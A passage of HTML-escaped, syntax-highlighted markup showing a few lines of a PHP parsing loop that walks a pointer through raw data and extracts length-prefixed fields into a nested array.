!important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-136&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;						&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-137&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;						&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$parsed&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;substr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-138&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;						&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-139&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-140&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-141&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;else&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-142&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-143&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;ord&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;substr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-144&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-145&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$parsed&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;substr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-146&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) 